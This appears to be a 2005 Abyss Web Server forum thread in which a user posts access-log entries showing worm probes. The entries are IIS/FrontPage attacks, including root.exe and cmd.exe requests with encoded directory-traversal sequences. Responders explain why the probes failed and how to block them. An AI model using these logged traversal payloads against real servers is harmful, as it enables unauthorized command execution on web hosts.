| View previous topic :: View next topic |
| Author |
Message |
Tim1681
-
Joined: 17 Jan 2005
Posts: 160
Location: Bristol, CT, USA
|
 Posted: Fri Apr 22, 2005 2:47 pm Post subject: Server Vulnerability |
 |
|
Would this be a sign of server vulnerability? From my Abyss Log File ..
| Code: | 24.2.161.177 - - [22/Apr/2005:03:41:36 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 463 "" ""
24.2.161.177 - - [22/Apr/2005:03:41:36 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 463 "" ""
24.2.161.177 - - [22/Apr/2005:03:41:36 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 463 "" ""
24.2.161.177 - - [22/Apr/2005:03:41:36 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 463 "" ""
24.2.161.177 - - [22/Apr/2005:03:41:36 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 463 "" ""
24.2.161.177 - - [22/Apr/2005:03:41:36 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 463 "" ""
24.2.161.177 - - [22/Apr/2005:03:41:36 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 463 "" ""
24.2.161.177 - - [22/Apr/2005:03:41:36 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 463 "" ""
24.2.161.177 - - [22/Apr/2005:05:33:45 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 463 "" ""
24.2.161.177 - - [22/Apr/2005:05:33:45 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 463 "" ""
24.2.161.177 - - [22/Apr/2005:05:33:45 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 463 "" ""
24.2.161.177 - - [22/Apr/2005:05:33:45 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 463 "" ""
24.2.161.177 - - [22/Apr/2005:05:33:45 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 463 "" ""
24.2.161.177 - - [22/Apr/2005:05:33:45 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 463 "" ""
24.2.161.177 - - [22/Apr/2005:05:33:45 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 463 "" ""
24.2.161.177 - - [22/Apr/2005:05:33:45 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 463 "" ""
24.2.139.197 - - [22/Apr/2005:07:02:14 -0400] "POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1" 404 463 "" ""
|
I don't like the way tht code looks ... |
|
| Back to top |
   |
 |
Anonymoose
-
Joined: 09 Sep 2003
Posts: 2192
|
| Posted: Fri Apr 22, 2005 3:18 pm Post subject: |
|
|
| No, that would be a sign of an old IIS/Frontpage worm trying to attack your server and failing miserably because it isn't IIS/Frontpage. A quick search of the forum would have confirmed this... |
|
| Back to top |
|
|
aprelium
-
Joined: 22 Mar 2002
Posts: 6800
|
| Posted: Fri Apr 22, 2005 8:35 pm Post subject: Re: Server Vulnerability |
|
|
Tim1681,
The server answers this requests with errors 400 and 404 (which means that the server refuses to respond or simply tells the client it has made an error).
So the server is not vulnerable. It would have been so if it processed the requests and returned error 200.
_________________
Support Team
Aprelium - http://www.aprelium.com |
|
| Back to top |
 |
|
Tim1681
-
Joined: 17 Jan 2005
Posts: 160
Location: Bristol, CT, USA
|
| Posted: Fri Apr 22, 2005 9:33 pm Post subject: |
|
|
| Sweet. Thnx. I love Abyss =) :D |
|
| Back to top |
|
|
Tim1681
-
Joined: 17 Jan 2005
Posts: 160
Location: Bristol, CT, USA
|
| Posted: Fri Apr 29, 2005 12:37 am Post subject: |
|
|
| Is it usual for this 'worm' to attempt to attack my server 20+ times DAILY? Because thats what its doing .. :-/ |
|
| Back to top |
|
|
aprelium
-
Joined: 22 Mar 2002
Posts: 6800
|
| Posted: Fri Apr 29, 2005 4:18 pm Post subject: |
|
|
| Tim1681 wrote: | | Is it usual for this 'worm' to attempt to attack my server 20+ times DAILY? Because thats what its doing .. :-/ |
All depends on how much people have computers that are affected by this worm. Last years we had days where 2000 hits were due to this kind of worms and other days with no worm attacks.
Have you activated the antihacking feature in Abyss Web Server? It will help you detect these attacks and stop them to save your bandwidth.
_________________
Support Team
Aprelium - http://www.aprelium.com |
|
| Back to top |
|
|
Tim1681
-
Joined: 17 Jan 2005
Posts: 160
Location: Bristol, CT, USA
|
| Posted: Fri Apr 29, 2005 7:31 pm Post subject: |
|
|
| Yea i have that activated, luckily Abyss isnt letting 'em get through. Thxnfor the info ;-) |
|
| Back to top |
|
|
cmxflash
-
Joined: 11 Dec 2004
Posts: 872
|
| Posted: Fri Apr 29, 2005 7:54 pm Post subject: |
|
|
| Tim1681 wrote: | | Yea i have that activated, luckily Abyss isnt letting 'em get through. Thxnfor the info ;-) |
If it's the same person who attacks you every time, simply block his IP or IP-range, like "24.2.*.*". |
|
| Back to top |
|
|
Tim1681
-
Joined: 17 Jan 2005
Posts: 160
Location: Bristol, CT, USA
|
| Posted: Sat Apr 30, 2005 12:14 am Post subject: |
|
|
| Well it changes between 5 but i will try that later tonite. If I decided to block that IP range, many ppl in my area tht use comcast wouldnt be able to access my site lol =) |
|
| Back to top |
|
|
|
